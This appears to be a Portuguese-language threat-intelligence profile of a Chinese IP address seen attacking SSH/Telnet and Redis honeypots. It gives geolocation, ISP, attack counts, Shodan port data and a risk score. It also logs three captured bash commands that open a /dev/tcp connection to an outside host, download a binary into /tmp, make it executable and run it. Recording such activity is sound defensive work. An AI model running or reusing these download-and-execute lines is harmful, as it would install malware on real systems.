Ameaca Ativa • ALTO
120.220.243.134
Pais de Origem🇨🇳 China
Primeira Deteccao05/05/2026
Ultima Atividade05/05/2026
ISPChina Mobile Communications Group Co., Ltd.
🎯
121
Ataques Totais
🔌
2
Portas
📡
2
Tipos de Ataque
🦠
3
Malware
Geolocalizacao
- Pais
- 🇨🇳 China
- Cidade
- Desconhecida
- ASN
- AS9808
- ISP
- China Mobile Communications Group Co., Ltd.
Tipos de Ataque
ssh_telnet_honeypot
redis_honeypot
Portas Atacadas
226379
Malware Associado
Comandos Executados
$
nohup bash -c "exec 6<>/dev/tcp/114.215.193.12/60124 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/CcjQHuFCWJ && chmod +x /tmp/CcjQHuFCWJ && /tmp/CcjQHuFCWJ t563SDRXtI/P1I+/Si5ItITMyo+0TSBIv4zUy4i2VzFLsJDNwoSwSTFJtjbB90EVOHF/zDM6" &1x$
nohup bash -c "exec 6<>/dev/tcp/114.215.193.12/60124 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/HaHa6W74Pj && chmod +x /tmp/HaHa6W74Pj && /tmp/HaHa6W74Pj PUxsW3yIMpd9RGxVT1Jdb1B+ljGUfEpsVU5SXWtaZpcykGZdZVZKTF1tWriEi85AtTQTCKTW6MR9cA==" &1x$
nohup bash -c "exec 6<>/dev/tcp/114.215.193.12/60124 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/LggnKrORwP && chmod +x /tmp/LggnKrORwP && /tmp/LggnKrORwP o+dhqPG7p/Ssfvbb0elhq/+jpfSrZOfT2/V+qPOlu/SrZunV2v1mqfSlpbLNWbCtSt9oKQkKUB8T" &1xExposicao Shodan InternetDBShodan
Dados InternetDB, nao em tempo real
Portas
11160006379
CPEs
cpe:/a:redislabs:redis
Avaliacao de Risco
60
/100
BaixoMedioAltoCritico